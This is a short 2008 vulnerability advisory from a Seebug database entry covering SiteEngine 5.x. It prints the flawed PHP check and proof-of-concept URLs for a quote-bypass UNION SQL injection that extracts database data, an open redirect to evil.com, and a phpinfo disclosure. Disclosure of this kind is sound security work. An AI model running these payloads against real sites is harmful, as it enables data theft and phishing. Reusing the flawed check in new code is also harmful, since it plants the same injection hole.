SiteEngine 5.x Multiple Remote Vulnerabilities

2008-10-24T00:00:00
ID SSV:9792
Type seebug
Reporter Root
Modified 2008-10-24T00:00:00

Description

No description provided by source.

                                        
                                            
                                                SiteEngine 5.x Multiple Remote Vulnerabilities
Due to incorrect use of intval function, leading to the logic of inspection parameters can be bypassed, resulting in SQL injection vulnerability.

-=0x01=- SQL injection Vulnerability
vul code like this:
if ( intval( $id ) )
{
    require_once( $site_engine_root."lib/rss.php" );
$sql = "SELECT url FROM ".$tablepre."feed WHERE id={$id} AND uploader='{$SESSION['uid']}'";

POC:
http://www.test.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20/*
This vulnerability exist in board.php too……

-=0x02=- URI Redirection Vulnerability
POC:
http://www.test.com/api.php?action=logout&forward=http://evil.com

-=0x03=- Information Disclosure Vulnerability
POC:
http://www.test.com/misc.php?action=php_info

ForFun~

-=EOF=-